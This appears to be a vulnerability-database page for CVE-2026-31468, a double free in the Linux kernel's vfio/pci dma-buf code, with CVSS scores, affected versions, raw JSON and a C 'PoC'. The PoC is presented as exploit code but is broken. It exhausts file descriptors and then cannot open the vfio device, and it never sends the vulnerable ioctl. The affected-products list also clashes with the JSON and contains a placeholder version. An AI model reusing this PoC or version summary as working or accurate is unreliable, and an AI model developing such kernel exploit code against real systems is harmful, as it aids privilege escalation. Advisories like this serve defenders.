Security Vulnerability Report
CVE-2026-31468 CVSS 7.8 HIGH

CVE-2026-31468

Published: 2026-04-22 14:16:43
Last Modified: 2026-05-07 18:20:20
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

vfio/pci: Fix double free in dma-buf feature

The error path through vfio_pci_core_feature_dma_buf() ignores its own advice to only use dma_buf_put() after dma_buf_export(), instead falling through the entire unwind chain. In the unlikely event that we encounter file descriptor exhaustion, this can result in an unbalanced refcount on the vfio device and double free of allocated objects.

Avoid this by moving the "put" directly into the error path and return the errno rather than entering the unwind chain.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:* - VULNERABLE
Linux Kernel < (specific fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * PoC for CVE-2026-31468: Trigger double free in vfio/pci
 * This code attempts to exhaust file descriptors and trigger the vulnerable path.
 * Compile: gcc -o poc poc.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/vfio.h>

/* Open /dev/null repeatedly until open() fails, leaving the process at its
 * per-process file descriptor limit (the loop assumes a limit of at most 1024). */
void exhaust_fds(void)
{
    int i;
    for (i = 0; i < 1024; i++) {
        if (open("/dev/null", O_RDONLY) < 0) {
            printf("FDs exhausted at %d\n", i);
            break;
        }
    }
}

int main(void)
{
    /* Step 1: Exhaust file descriptors to trigger EMFILE error path */
    exhaust_fds();

    /* Step 2: Attempt to trigger the vulnerable ioctl
     * Note: Requires a valid vfio device and setup, simplified for PoC structure.
     * With the descriptor table already full, this open() itself fails with
     * EMFILE, so the program exits here. */
    int fd = open("/dev/vfio/0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open vfio device");
        return 1;
    }

    /* Triggering the specific dma-buf feature logic requires complex setup;
     * this demonstrates the concept of hitting the error path. */
    printf("Triggering vulnerable path...\n");
    /* Actual exploit would send specific ioctl commands to reach vfio_pci_core_feature_dma_buf */
    close(fd);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31468", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:43.143", "lastModified": "2026-05-07T18:20:19.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Fix double free in dma-buf feature\n\nThe error path through vfio_pci_core_feature_dma_buf() ignores its\nown advice to only use dma_buf_put() after dma_buf_export(), instead\nfalling through the entire unwind chain. In the unlikely event that\nwe encounter file descriptor exhaustion, this can result in an\nunbalanced refcount on the vfio device and double free of allocated\nobjects.\n\nAvoid this by moving the \"put\" directly into the error path and return\nthe errno rather than entering the unwind chain."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/83ad334afc9a645cef1062f5346526b1e36d6516", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e98137f0a874ab36d0946de4707aa48cb7137d1c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}